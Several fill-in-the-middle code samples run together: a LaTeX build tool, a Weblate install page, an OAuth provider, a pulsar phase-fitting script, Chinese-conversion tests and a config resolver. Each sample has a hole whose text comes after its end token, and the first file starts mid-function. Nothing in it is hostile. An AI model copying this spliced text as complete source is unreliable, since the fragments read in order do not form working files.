if not os.path.exists(file):
continue
new = md5_file(file)
if md5 != new:
msg.progress(_("running %s") % self.onchange_cmd[file])
self.env.execute(["sh", "-c", self.onchange_cmd[file]])
self.onchange_md5[file] = new
for mod in self.modules.objects.values():
if not mod.post_compile():
self.failed_module = mod
return False
return True
def clean (self, all=0):
"""
Remove all files that are produced by compilation.
"""
self.remove_suffixes([".log", ".aux", ".toc", ".lof", ".lot"])
for file in self.products + self.removed_files:
if os.path.exists(file):
msg.log(_("removing %s") % file, pkg='latex')
os.unlink(file)
msg.log(_("cleaning additional files..."), pkg='latex')
for dep in self.source_nodes():
dep.clean()
for mod in self.modules.objects.values():
mod.clean()
#-- Building routine {{{2
def force_run (self):
return self.run(True)
def run (self, force=False):
"""
Run the building process until the last compilation, or stop on error.
This method supposes that the inputs were parsed to register packages
and that the LaTeX source is ready. If the second (optional) argument
is true, then at least one compilation is done. As specified by the
class depend.Node, the method returns True on success and False on
failure.
"""
if not self.pre_compile(force):
return False
# If an error occurs after this point, it will be while LaTeXing.
self.failed_dep = self
self.failed_module = None
if force or self.compile_needed():
self.must_compile = False
if not self.compile():
return False
if not self.post_compile():
return False
while self.recompile_needed():
self.must_compile = False
if not self.compile():
return False
if not self.post_compile():
return False
# Finally there was no error.
self.failed_dep = None
if self.something_done:
self.date = int(time.time())
return True
def compile_needed (self):
"""
Returns true if a first compilation is needed. This method supposes
that no compilation was done (by the script) yet.
"""
if self.must_compile:
return 1
msg.log(_("checking if compiling is necessary..."), pkg='latex')
if not os.path.exists(self.products[0]):
msg.debug(_("the output file doesn't exist"), pkg='latex')
return 1
if not os.path.exists(self.target + ".log"):
msg.debug(_("the log file does not exist"), pkg='latex')
return 1
if os.path.getmtime(self.products[0]) < os.path.getmtime(self.source()):
msg.debug(_("the source is younger than the output file"), pkg='latex')
return 1
if self.log.read(self.target + ".log"):
msg.debug(_("the log file is not produced by TeX"), pkg='latex')
return 1
return self.recompile_needed()
def recompile_needed (self):
"""
Returns true if another compilation is needed. This method is used
when a compilation has already been done.
"""
if self.must_compile:
self.update_watches()
return 1
if self.log.errors():
msg.debug(_("last compilation failed"), pkg='latex')
self.update_watches()
return 1
if self.deps_modified(os.path.getmtime(self.products[0])):
msg.debug(_("dependencies were modified"), pkg='latex')
self.update_watches()
return 1
suffix = self.update_watches()
if suffix:
msg.debug(_("the %s file has changed") % suffix, pkg='latex')
return 1
if self.log.run_needed():
msg.debug(_("LaTeX asks to run again"), pkg='latex')
aux_changed = 0
for aux, md5 in self.aux_md5.items():
if md5 is not None and md5 != self.aux_old[aux]:
aux_changed = 1
break
if not aux_changed:
msg.debug(_("but the aux files are unchanged"), pkg='latex')
return 0
return 1
msg.debug(_("no new compilation is needed"), pkg='latex')
return 0
def deps_modified (self, date):
"""
Returns true if any of the dependencies is younger than the specified
date.
"""
for name in self.sources:
if name in self.not_included:
continue
node = self.set[name]
if node.date > date:
return True
return False
#-- Utility methods {{{2
def get_errors (self):
if self.failed_module is None:
return self.log.get_errors()
else:
return self.failed_module.get_errors()
def watch_file (self, file):
"""
Register the given file (typically "jobname.toc" or such) to be
watched. When the file changes during a compilation, it means that
another compilation has to be done.
"""
if os.path.exists(file):
self.watched_files[file] = md5_file(file)
else:
self.watched_files[file] = None
def update_watches (self):
"""
Update the MD5 sums of all files watched, and return the name of one
of the files that changed, or None of they didn't change.
"""
changed = None
for file in self.watched_files.keys():
if os.path.exists(file):
new = md5_file(file)
if self.watched_files[file] != new:
changed = file
self.watched_files[file] = new
return changed
def remove_suffixes (self, list):
"""
Remove all files derived from the main source with one of the
specified suffixes.
"""
for suffix in list:
file = self.target + suffix
if os.path.exists(file):
msg.log(_("removing %s") % file, pkg='latex')
os.unlink(file)
#---- Base classes for modules ----{{{1
class Module (object):
"""
This is the base class for modules. Each module should define a class
named 'Module' that derives from this one. The default implementation
provides all required methods with no effects.
"""
def __init__ (self, env, dict):
"""
The constructor receives two arguments: 'env' is the compiling
environment, 'dict' is a dictionary that describes the command that
caused the module to load.
"""
def pre_compile (self):
"""
This method is called before the first LaTeX compilation. It is
supposed to build any file that LaTeX would require to compile the
document correctly. The method must return true on success.
"""
return True
def post_compile (self):
"""
This method is called after each LaTeX compilation. It is supposed to
process the compilation results and possibly request a new
compilation. The method must return true on success.
"""
return True
def clean (self):
"""
This method is called when cleaning the compiled files. It is supposed
to remove all the files that this modules generates.
"""
def command (self, cmd, args):
"""
This is called when a directive for the module is found in the source.
The method can raise 'AttributeError' when the directive does not
exist and 'TypeError' if the syntax is wrong. By default, when called
with argument "foo" it calls the method "do_foo" if it exists, and
fails otherwise.
"""
getattr(self, "do_" + cmd)(*args)
def get_errors (self):
"""
This is called if something has failed during an operation performed
by this module. The method returns a generator with items of the same
form as in LaTeXDep.get_errors.
"""
if None:
yield None
class ScriptModule (Module):
"""
This class represents modules that are defined as Rubber scripts.
"""
def __init__ (self, env, filename):
vars = Variables(env.vars, {
'file': filename,
'line': None })
lineno = 0
file = open(filename)
for line in file.readlines():
line = line.strip()
lineno = lineno + 1
if line == "" or line[0] == "%":
continue
vars['line'] = lineno
lst = parse_line(line, vars)
env.command(lst[0], lst[1:], vars)
file.close()
class PyModule (Module):
def __init__ (self, document, pymodule, context):
self.pymodule = pymodule
if hasattr(pymodule, 'setup'):
pymodule.setup(document, context)
def pre_compile (self):
if hasattr(self.pymodule, 'pre_compile'):
return self.pymodule.pre_compile()
return True
def post_compile (self):
if hasattr(self.pymodule, 'post_compile'):
return self.pymodule.post_compile()
return True
def clean (self):
if hasattr(self.pymodule, 'clean'):
self.pymodule.clean()
def command (self, cmd, args):
if hasattr(self.pymodule, 'command'):
self.pymodule.command(cmd, args)
else:
getattr(self.pymodule, "do_" + cmd)(*args)
def get_errors (self):
if hasattr(self.pymodule, 'get_errors'):
return self.pymodule.get_errors()
return []<|fim▁end|>
|
"listoftables" : ("", self.h_listoftables),
"bibliography" : ("a", self.h_bibliography),
"bibliographystyle" : ("a", self.h_bibliographystyle),
|
<|file_name|>selectors.js<|end_file_name|><|fim▁begin|>import hasFeature from './has';
export function prop(path) {<|fim▁hole|> const names = path.split('.');
if (!(names[0] in props)) {
throw new Error(`Missing required prop ${names[0]}.`);
}
return names.reduce((p, name) => (p && p[name]), props);
};
}
export function has(featureName) {
return function(_props, _state, browser) {
return hasFeature(featureName, browser);
};
}<|fim▁end|>
|
return function(state, props) {
|
<|file_name|>wsgi_install.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright © 2014 Daniel Tschan <tschan@puzzle.ch>
#
# This file is part of Weblate <https://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
import os
from string import Template
VIRTUALENV = os.path.join(
os.environ['OPENSHIFT_PYTHON_DIR'], 'virtenv', 'bin', 'activate_this.py'
)
with open(VIRTUALENV) as handle:
code = compile(handle.read(), 'activate_this.py', 'exec')
# pylint: disable=exec-used
exec(code, dict(__file__=VIRTUALENV)) # noqa
def application(environ, start_response):
ctype = 'text/html'
response_body = Template('''<!doctype html>
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8">
<title>Installing Weblate</title>
<style>
html {
background: #f5f5f5;
height: 100%;
}
body {
color: #404040;
font-family: "Helvetica Neue",Helvetica,"Liberation Sans",Arial,sans-serif;
font-size: 14px;
line-height: 1.4;
}
h1 {
color: #000;
line-height: 1.38em;
margin: .4em 0 .5em;
font-size: 25px;
font-weight: 300;
border-bottom: 1px solid #fff;
}
h1:after {
content: "";
display: block;
height: 1px;
background-color: #ddd;
}<|fim▁hole|>pre {
padding: 13.333px 20px;
margin: 0 0 20px;
font-size: 13px;
line-height: 1.4;
background-color: #fff;
border-left: 2px solid rgba(120,120,120,0.35);
font-family: Menlo,Monaco,"Liberation Mono",Consolas,monospace !important;
}
.content {
display: table;
margin-left: -15px;
margin-right: -15px;
position: relative;
min-height: 1px;
padding-left: 30px;
padding-right: 30px;
}
</style>
</head>
<body>
<div class="content">
<h1>$action1 Weblate</h1>
<p>
Weblate is being $action2.
Please wait a few minutes and refresh this page.
</p>
$log
</div>
</body>
</html>''')
context = {}
if os.path.exists(os.environ['OPENSHIFT_DATA_DIR'] + '/.installed'):
context['action1'] = 'Updating'
context['action2'] = 'updated'
context['log'] = ''
else:
context['action1'] = 'Installing'
context['action2'] = 'installed'
log_msg = os.popen(
r"cat ${OPENSHIFT_PYTHON_LOG_DIR}/install.log |"
r" grep '^[^ ]\|setup.py install' |"
r" sed 's,/var/lib/openshift/[a-z0-9]\{24\},~,g'"
).read()
context['log'] = '<pre>' + log_msg + '</pre>'
response_body = response_body.substitute(context)
status = '200 OK'
response_headers = [
('Content-Type', ctype),
('Content-Length', str(len(response_body)))
]
start_response(status, response_headers)
return [response_body]<|fim▁end|>
|
p {
margin: 0 0 2em;
}
|
<|file_name|>provider.py<|end_file_name|><|fim▁begin|>from allauth.socialaccount.providers.base import AuthAction, ProviderAccount
from allauth.socialaccount.providers.oauth2.provider import OAuth2Provider
class Scope(object):
ACCESS = 'read-only'
class YNABAccount(ProviderAccount):
pass
<|fim▁hole|> name = 'YNAB'
account_class = YNABAccount
def get_default_scope(self):
scope = [Scope.ACCESS]
return scope
def get_auth_params(self, request, action):
ret = super(YNABProvider, self).get_auth_params(request,
action)
if action == AuthAction.REAUTHENTICATE:
ret['prompt'] = 'select_account consent'
return ret
def extract_uid(self, data):
return str(data['data']['user']['id'])
provider_classes = [YNABProvider]<|fim▁end|>
|
class YNABProvider(OAuth2Provider):
id = 'ynab'
|
<|file_name|>DamAutoCroppingTest.java<|end_file_name|><|fim▁begin|>/*
* #%L
* wcm.io
* %%
* Copyright (C) 2019 wcm.io
* %%
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* #L%
*/
package io.wcm.handler.mediasource.dam.impl;
import static com.day.cq.dam.api.DamConstants.PREFIX_ASSET_WEB;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertNull;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.extension.ExtendWith;
import com.day.cq.dam.api.Asset;
import com.day.cq.dam.api.Rendition;
<|fim▁hole|>import io.wcm.testing.mock.aem.junit5.AemContext;
import io.wcm.testing.mock.aem.junit5.AemContextExtension;
@ExtendWith(AemContextExtension.class)
class DamAutoCroppingTest {
private final AemContext context = AppAemContext.newAemContext();
@Test
@SuppressWarnings("null")
void testGetWebRenditionForCropping() {
Asset asset = context.create().asset("/content/dam/asset1.jpg", 160, 90, "image/jpeg");
Rendition webRendition = context.create().assetRendition(asset, PREFIX_ASSET_WEB + ".80.45.jpg", 80, 45, "image/jpeg");
RenditionMetadata result = DamAutoCropping.getWebRenditionForCropping(asset);
assertEquals(webRendition.getPath(), result.getRendition().getPath());
}
@Test
void testGetWebRenditionNotExisting() {
Asset assetWithoutRenditions = context.create().asset("/content/dam/asset2.jpg", 160, 90, "image/jpeg");
assertNull(DamAutoCropping.getWebRenditionForCropping(assetWithoutRenditions));
}
}<|fim▁end|>
|
import io.wcm.handler.media.testcontext.AppAemContext;
|
<|file_name|>fitharms.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
from __future__ import print_function,division
from astropy.io import fits
import matplotlib.pyplot as plt
import numpy as np
import matplotlib
from pint.templates import lctemplate,lcprimitives,lcfitters
from pint.eventstats import z2m,sf_z2m, hm, sf_hm, sig2sigma
import sys
from astropy import log
import scipy.stats
def compute_fourier(phases,nh=10,pow_phase=False):
'''Compute Fourier amplitudes from an array of pulse phases
phases should be [0,1.0)
nh is the number of harmonics (1 = fundamental only)
Returns: cos and sin component arrays, unless pow_phase is True
then returns Fourier power (Leahy normalized) and phase arrays
DC bin is not computed or returned
'''
phis = 2.0*np.pi*phases # Convert phases to radians
n = len(phis)
c = np.asarray([(np.cos(k*phis)).sum() for k in range(1,nh+1)])/n
s = np.asarray([(np.sin(k*phis)).sum() for k in range(1,nh+1)])/n
c *= 2.0
s *= 2.0
if pow_phase:
# CHECK! There could be errors here!
# These should be Leahy normalized powers
fourier_pow = (n/2)*(c**2+s**2)
fourier_phases = np.arctan2(s,c)
return n,fourier_pow,fourier_phases
else:
return n,c,s
def evaluate_fourier(n,c,s,nbins,k=None):
# This should be updated to do a little integral over each bin.
# Currently evaluates the model at the center of each bin
model = np.zeros(nbins)+n/nbins
theta = 2.0*np.pi*np.arange(nbins,dtype=np.float)/nbins
theta += theta[1]/2.0
if k is not None:
model += (n/nbins)*(c[k]*np.cos((k+1)*theta) + s[k]*np.sin((k+1)*theta))
else:
for k in range(len(c)):
model += (n/nbins)*(c[k]*np.cos((k+1)*theta) + s[k]*np.sin((k+1)*theta))
return model
def evaluate_chi2(hist,model):
# Question here is whether error should be sqrt(data) or sqrt(model)
return ((hist-model)**2/model).sum()
def compute_phist(phases,nbins=200):
h, edges = np.histogram(phases,bins=np.linspace(0.0,1.0,nbins+1,endpoint=True))
return edges[:-1], h
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description = "Fit a set of pulse phases to harmonics")
parser.add_argument("evname", help="Input event file (must have PULSE_PHASE column)")
parser.add_argument("--white",help = "Replace phases with white random numbers, for testing", action="store_true")
parser.add_argument("--txt",help = "Assume input file is .txt instead of FITS", action="store_true")
parser.add_argument("--showcomps",help = "Show individual components of harmonic fit on plot", action="store_true")
parser.add_argument("--noplot",help = "Don't show any plots", action="store_true")
parser.add_argument("--output",help = "Save figures with basename", default=None)
parser.add_argument("--numharm",help="Max harmonic to use in analysis (1=Fundamental only)",default=4,type=int)
parser.add_argument("--numbins",help="Number of bins for histograms",default=200,type=int)
parser.add_argument("--emin",help="Minimum energy to include (keV)",default=0.25,type=float)
parser.add_argument("--emax",help="Maximum energy to include (keV)",default=12.0,type=float)
args = parser.parse_args()
if args.txt:
exposure = None
ph,en = np.loadtxt(args.evname,unpack=True,usecols=(1,2),skiprows=3)
log.info("Read {0} phases from .txt file".format(len(ph)))
tstart = 0.0
else:
f = fits.open(args.evname)
en = f['events'].data.field('pi')
ph = f['events'].data.field('pulse_phase')
log.info("Read {0} phases from FITS file".format(len(ph)))
exposure = float(f['events'].header['EXPOSURE'])
tstart = float(f['events'].header['TSTART'])
log.info("Exposure = {0} s".format(exposure))
if args.white:
# Random phases uniform over [0,1)
ph = np.random.random_sample(len(en))
log.info("Replaced with {0} random phases".format(len(en)))
matplotlib.rcParams['font.family'] = "serif"
matplotlib.rcParams.update({'font.size': 13})
matplotlib.rc('axes', linewidth=1.5)
if args.output:
resultsfile = open("{0}_results.txt".format(args.output),"w")
print("{0:.6f}".format(tstart),file=resultsfile)
# Filter on energy
idx = np.where(np.logical_and(en > int(args.emin*100), en < int(args.emax*100) ))[0]
ph = ph[idx]
en = en[idx]
# Hack to manually split out a segment
#q = 3 # Use 0, 1, 2, 3
#qn = len(ph)//4
#ph = ph[q*qn:(q+1)*qn]
#en = en[q*qn:(q+1)*qn]
nbins = args.numbins
bins,phist = compute_phist(ph,nbins=nbins)
fig,axs = plt.subplots(nrows=2,ncols=1)
plt.subplots_adjust(left=0.15, bottom=0.1, right=0.97, top=0.94,hspace=0.001)
ax=axs[0]
ax.tick_params(direction='in', length=6, width=2, colors='k',top=True, right=True, labelbottom=False)
# ax.text(.5,.8,'PSR J0030+0451', horizontalalignment='center', transform=ax.transAxes)
# ax.text(.5,.8,'PSR J0437-4715', horizontalalignment='center', transform=ax.transAxes)
# ax.text(.2,.8,'PSR J1231-1411', horizontalalignment='center', transform=ax.transAxes)
# ax.text(.8,.8,'PSR J2124-3358', horizontalalignment='center', transform=ax.transAxes)
ax.step(np.concatenate((bins,np.ones(1))),np.concatenate((phist,phist[-1:])),color='k',where='post')
ax.set_xlim(0.0,1.0)
ax.set_ylabel('Counts per bin')
n,c,s = compute_fourier(ph,nh=args.numharm)
model = evaluate_fourier(n,c,s,nbins)
ax.plot(bins+bins[1]/2.0,model,color='r',lw=2)
if args.showcomps:
for k in range(len(c)):
ax.plot(np.linspace(0.0,1.0,nbins),evaluate_fourier(n,c,s,nbins,k=k),ls='--')
fn,fpow,fphase = compute_fourier(ph,nh=args.numharm,pow_phase=True)
i=1
log.info("Harm LeahyPower Phase(deg)")
for fp, fph in zip(fpow,fphase):
log.info("{0:2d} {1:12.3f} {2:9.3f} deg".format(i,fp,np.rad2deg(fph)))
if args.output:
print("{0:2d} {1:12.3f} {2:9.3f}".format(i,fp,np.rad2deg(fph)),file=resultsfile)
i+=1
pcounts = (model-model.min()).sum()
pcounts_err = np.sqrt(model.sum() + model.min()*len(model))
if exposure:
log.info("Pulsed counts = {0:.3f}, count rate = {1:.3f}+/-{2:.4f} c/s".format(pcounts, pcounts/exposure, pcounts_err/exposure))
log.info("Total rate = {0:.3f} c/s, Unpulsed rate = {1:.3f} c/s".format(n/exposure, n/exposure-pcounts/exposure))
ax = axs[1]
ax.tick_params(direction='in', length=6, width=2, colors='k',top=True, right=True)
ax.errorbar(np.linspace(0.0,1.0,nbins),phist-model,yerr=np.sqrt(phist),fmt='.',ecolor='k')
chisq = evaluate_chi2(phist,model)
nparams = 1 + 2*args.numharm # 1 for DC + 2 for each sinusoidal component
ax.set_xlim(0.0,1.0)
ax.set_xlabel('Pulse Phase')
ax.set_ylabel('Residuals (counts)')
ax.tick_params(direction='in', length=6, width=2, colors='k',top=True)
ndof = len(phist)-nparams
axs[0].set_title("NumHarm = {0}, Chisq = {1:.2f}, DOF = {2}".format(args.numharm,chisq,ndof))
ax.grid(1)
# ax.set_label("{0} Harmonic Fit to Profile".format(args.numharm))
plt.tight_layout()
if args.output:
fig.savefig("{0}_harmfit.pdf".format(args.output))
# Plot distribution of residuals to compare to a gaussian
fig,ax = plt.subplots()
ax.tick_params(direction='in', length=6, width=2, colors='k',top=True, right=True)
chi = (phist-model)/np.sqrt(model)
#x, y = np.histogram(chi,bins=np.linspace(-2.0,2.0,0.1))
x = np.linspace(-3.0,3.0,32,endpoint=True)
ax.hist(chi,bins=x,density=True)
ax.set_title('Histogram of residuals')
ax.plot(x,scipy.stats.norm.pdf(x))
plt.tight_layout()
# Plot histogram of phase differences to see if they are Poisson
fig,ax = plt.subplots()
ax.tick_params(direction='in', length=6, width=2, colors='k',top=True, right=True)
ph.sort()
pdiffs = (ph[1:]-ph[:-1])*1.0
x = np.linspace(0.0,50.0e-6,200,endpoint=True)
histn, histbins, histpatches = ax.hist(pdiffs,bins=x,density=True,log=True)
ax.set_title('Histogram of phase differences')
ax.set_xlabel('Phase diff')
ax.plot(x,np.exp(-len(pdiffs)*(x*1.0))*n)
plt.tight_layout()
# Compute number of significant harmonics
# First by plotting Leahy powers
fig,axs = plt.subplots(nrows=2,ncols=1)
ax = axs[0]
ax.tick_params(direction='in', length=6, width=2, colors='k',top=True, right=True)
n,pow,phases = compute_fourier(ph,nh=nbins//2,pow_phase=True)
ax.semilogy(np.arange(len(pow))+1,pow,marker='o')
# Leahy power of 5.99 corresponds to 2 sigma, I think<|fim▁hole|> ax.axhline(2.0,color='b',ls='--')
#ax.xaxis.set_ticks(np.arange(1,len(pow)+1))
#ax.set_xlabel('Harmonic Number')
ax.set_ylabel('Leahy Power')
ax.set_title("Power Spectrum")
plt.tight_layout()
ax = axs[1]
ax.tick_params(direction='in', length=6, width=2, colors='k',top=True, right=True)
ax.plot(np.arange(len(pow))+1,pow,marker='o')
ax.axhline(5.99,color='r')
ax.axhline(2.0,color='b',ls='--')
#ax.xaxis.set_ticks(np.arange(1,len(pow)+1))
ax.set_ylim(0.0,10.0)
ax.text(1.0,7.0,'Mean power {0:.3f}'.format(pow.mean()))
ax.set_xlabel('Harmonic Number')
ax.set_ylabel('Leahy Power')
if args.output:
fig.savefig("{0}_leahy.pdf".format(args.output))
plt.tight_layout()
# Then by computing chisq as a function of number of harmonics in model
chisq = []
ndof = []
maxharms = np.arange(1,min(33,nbins//4+1))
n,c,s = compute_fourier(ph,nh=maxharms[-1])
for maxharm in maxharms:
model = evaluate_fourier(n,c[:maxharm],s[:maxharm],nbins)
chisq.append(evaluate_chi2(phist,model))
nparams = 1 + 2*maxharm # 1 for DC + 2 for each sinusoidal component
ndof.append(len(phist)-nparams)
chisq = np.asarray(chisq)
ndof = np.asarray(ndof)
fig,ax = plt.subplots()
ax.tick_params(direction='in', length=6, width=2, colors='k',top=True, right=True)
ax.plot(maxharms,chisq/ndof,'o',ls='-')
ax.set_ylim(0.5,3.0)
ax.axhline(1.0,color='r',ls='--')
ax.set_xlabel('Number of Harmonics')
ax.set_ylabel('Chisq')
ax.set_title("Chisq/DOF vs. Number of Harmonics")
#ax.xaxis.set_ticks(maxharms)
#ax.semilogy(maxharms,ndof)
plt.tight_layout()
if args.output:
fig.savefig("{0}_chisq.pdf".format(args.output))
# Then look at amplitudes and phases as a function of energy cuts
# Look at color oscillations
# Select photons above and below some energy cut and look at the ratio
ensplit = 55
softidx = np.where(en<ensplit)[0]
hardidx = np.where(en>=ensplit)[0]
colorbins = 32
softbins, softn = compute_phist(ph[softidx],nbins=colorbins)
hardbins, hardn = compute_phist(ph[hardidx],nbins=colorbins)
softn = np.asarray(softn,dtype=np.float)
hardn = np.asarray(hardn,dtype=np.float)
fig,ax = plt.subplots()
color = hardn/softn
# Propagate Poisson errors to get error in ratio
cerr = color*np.sqrt(1.0/softn + 1.0/hardn)
#ax.step(np.concatenate((softbins,np.ones(1))),np.concatenate((color,color[-1:])),color='C0',where='post')
ax.errorbar(softbins+0.5*softbins[1],color,yerr=cerr,color='k',fmt='.')
ax.set_xlim(0.0,1.0)
ax.set_xlabel('Pulse Phase')
ax.set_ylabel('Spectral Color')
if not args.noplot:
plt.show()<|fim▁end|>
|
ax.axhline(5.99,color='r')
|
<|file_name|>conversion_test.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os
import unittest
class OpenCCTest(unittest.TestCase):
def setUp(self):
self.openCC = OpenCC()
def test_hk2s(self):
self.openCC.set_conversion('hk2s')
words = '香煙(英語:Cigarette),為煙草製品的一種。滑鼠是一種很常見及常用的電腦輸入設備。'
self.assertEqual(self.openCC.convert(words), '香烟(英语:Cigarette),为烟草制品的一种。滑鼠是一种很常见及常用的电脑输入设备。')
<|fim▁hole|> self.assertEqual(self.openCC.convert(words), '香煙(英語:Cigarette),為煙草製品的一種。鼠標是一種很常見及常用的電腦輸入設備。')
def test_s2t(self):
self.openCC.set_conversion('s2t')
words = '香烟(英语:Cigarette),为烟草制品的一种。鼠标是一种很常见及常用的电脑输入设备。'
self.assertEqual(self.openCC.convert(words), '香菸(英語:Cigarette),爲菸草製品的一種。鼠標是一種很常見及常用的電腦輸入設備。')
def test_s2tw(self):
self.openCC.set_conversion('s2tw')
words = '香烟(英语:Cigarette),为烟草制品的一种。鼠标是一种很常见及常用的电脑输入设备。'
self.assertEqual(self.openCC.convert(words), '香菸(英語:Cigarette),為菸草製品的一種。鼠標是一種很常見及常用的電腦輸入設備。')
def test_s2twp(self):
self.openCC.set_conversion('s2twp')
words = '香烟(英语:Cigarette),为烟草制品的一种。內存是一种很常见及常用的电脑输入设备。'
self.assertEqual(self.openCC.convert(words), '香菸(英語:Cigarette),為菸草製品的一種。記憶體是一種很常見及常用的電腦輸入裝置。')
def test_t2hk(self):
self.openCC.set_conversion('t2hk')
words = '香菸(英語:Cigarette),爲菸草製品的一種。滑鼠是一種很常見及常用的電腦輸入裝置。'
self.assertEqual(self.openCC.convert(words), '香煙(英語:Cigarette),為煙草製品的一種。滑鼠是一種很常見及常用的電腦輸入裝置。')
def test_t2s(self):
self.openCC.set_conversion('t2s')
words = '香菸(英語:Cigarette),爲菸草製品的一種。滑鼠是一種很常見及常用的電腦輸入裝置。'
self.assertEqual(self.openCC.convert(words), '香烟(英语:Cigarette),为烟草制品的一种。滑鼠是一种很常见及常用的电脑输入装置。')
def test_t2tw(self):
self.openCC.set_conversion('t2tw')
words = '香菸(英語:Cigarette),爲菸草製品的一種。鼠標是一種很常見及常用的電腦輸入設備。'
self.assertEqual(self.openCC.convert(words), '香菸(英語:Cigarette),為菸草製品的一種。鼠標是一種很常見及常用的電腦輸入設備。')
def test_tw2s(self):
self.openCC.set_conversion('tw2s')
words = '香菸(英語:Cigarette),為菸草製品的一種。滑鼠是一種很常見及常用的電腦輸入裝置。'
self.assertEqual(self.openCC.convert(words), '香烟(英语:Cigarette),为烟草制品的一种。滑鼠是一种很常见及常用的电脑输入装置。')
def test_tw2sp(self):
self.openCC.set_conversion('tw2sp')
words = '香菸(英語:Cigarette),為菸草製品的一種。記憶體是一種很常見及常用的電腦輸入裝置。'
self.assertEqual(self.openCC.convert(words), '香烟(英语:Cigarette),为烟草制品的一种。内存是一种很常见及常用的电脑输入设备。')
if __name__ == '__main__':
sys.path.append(os.pardir)
from opencc import OpenCC
unittest.main()<|fim▁end|>
|
def test_s2hk(self):
self.openCC.set_conversion('s2hk')
words = '香烟(英语:Cigarette),为烟草制品的一种。鼠标是一种很常见及常用的电脑输入设备。'
|
<|file_name|>config.py<|end_file_name|><|fim▁begin|>import base64
import itertools
import json
import logging
import os
import re
import time
from .buckets import get_bucket_client
from .params import get_param_client
from .secrets import get_secret_client
logger = logging.getLogger("zentral.conf.config")
class Proxy:
pass
class EnvProxy(Proxy):
def __init__(self, name):
self._name = name
def get(self):
return os.environ[self._name]
class ResolverMethodProxy(Proxy):
def __init__(self, resolver, proxy_type, key):
if proxy_type == "file":
self._method = resolver.get_file_content
elif proxy_type == "param":
self._method = resolver.get_parameter_value
elif proxy_type == "secret":
self._method = resolver.get_secret_value
elif proxy_type == "bucket_file":
self._method = resolver.get_bucket_file
else:
raise ValueError("Unknown proxy type %s", proxy_type)
self._key = key
def get(self):
return self._method(self._key)
class JSONDecodeFilter(Proxy):
def __init__(self, child_proxy):
self._child_proxy = child_proxy
def get(self):
return json.loads(self._child_proxy.get())
class Base64DecodeFilter(Proxy):
def __init__(self, child_proxy):
self._child_proxy = child_proxy
def get(self):
return base64.b64decode(self._child_proxy.get())
class ElementFilter(Proxy):
def __init__(self, key, child_proxy):
try:
self._key = int(key)
except ValueError:
self._key = key
self._child_proxy = child_proxy
def get(self):
return self._child_proxy.get()[self._key]
class Resolver:
def __init__(self):
self._cache = {}
self._bucket_client = None
self._param_client = None
self._secret_client = None
def _get_or_create_cached_value(self, key, getter, ttl=None):
# happy path
try:
expiry, value = self._cache[key]
except KeyError:
pass
else:
if expiry is None or time.time() < expiry:
logger.debug("Key %s from cache", key)
return value
logger.debug("Cache for key %s has expired", key)
# get value
value = getter()
if ttl:
expiry = time.time() + ttl
else:
expiry = None
self._cache[key] = (expiry, value)
logger.debug("Set cache for key %s", key)
return value
def get_file_content(self, filepath):
cache_key = ("FILE", filepath)
def getter():
with open(filepath, "r") as f:
return f.read()
return self._get_or_create_cached_value(cache_key, getter)
def get_secret_value(self, name):
cache_key = ("SECRET", name)
if not self._secret_client:
self._secret_client = get_secret_client()
def getter():
return self._secret_client.get(name)
return self._get_or_create_cached_value(cache_key, getter, ttl=600)
def get_bucket_file(self, key):
cache_key = ("BUCKET_FILE", key)
if not self._bucket_client:
self._bucket_client = get_bucket_client()
def getter():
return self._bucket_client.download_to_tmpfile(key)
return self._get_or_create_cached_value(cache_key, getter)
def get_parameter_value(self, key):
cache_key = ("PARAM", key)
if not self._param_client:
self._param_client = get_param_client()
def getter():
return self._param_client.get(key)
return self._get_or_create_cached_value(cache_key, getter, ttl=600)
class BaseConfig:
PROXY_VAR_RE = re.compile(
r"^\{\{\s*"
r"(?P<type>bucket_file|env|file|param|secret)\:(?P<key>[^\}\|]+)"
r"(?P<filters>(\s*\|\s*(jsondecode|base64decode|element:[a-zA-Z_\-/0-9]+))*)"
r"\s*\}\}$"
)
custom_classes = {}
def __init__(self, path=None, resolver=None):
self._path = path or ()
if not resolver:
resolver = Resolver()
self._resolver = resolver
def _make_proxy(self, key, match):
proxy_type = match.group("type")
key = match.group("key").strip()
if proxy_type == "env":
proxy = EnvProxy(key)
else:
proxy = ResolverMethodProxy(self._resolver, proxy_type, key)
filters = [f for f in [rf.strip() for rf in match.group("filters").split("|")] if f]
for filter_name in filters:
if filter_name == "jsondecode":
proxy = JSONDecodeFilter(proxy)
elif filter_name == "base64decode":
proxy = Base64DecodeFilter(proxy)
elif filter_name.startswith("element:"):
key = filter_name.split(":", 1)[-1]
proxy = ElementFilter(key, proxy)
else:
raise ValueError("Unknown filter %s", filter_name)
return proxy
def _from_python(self, key, value):
new_path = self._path + (key,)
if isinstance(value, dict):
value = self.custom_classes.get(new_path, ConfigDict)(value, new_path)
elif isinstance(value, list):
value = self.custom_classes.get(new_path, ConfigList)(value, new_path)
elif isinstance(value, str):
match = self.PROXY_VAR_RE.match(value)
if match:
value = self._make_proxy(key, match)
return value
def _to_python(self, value):
if isinstance(value, Proxy):
return value.get()
else:
return value
def __len__(self):
return len(self._collection)
def __delitem__(self, key):
del self._collection[key]
def __setitem__(self, key, value):
self._collection[key] = self._from_python(key, value)
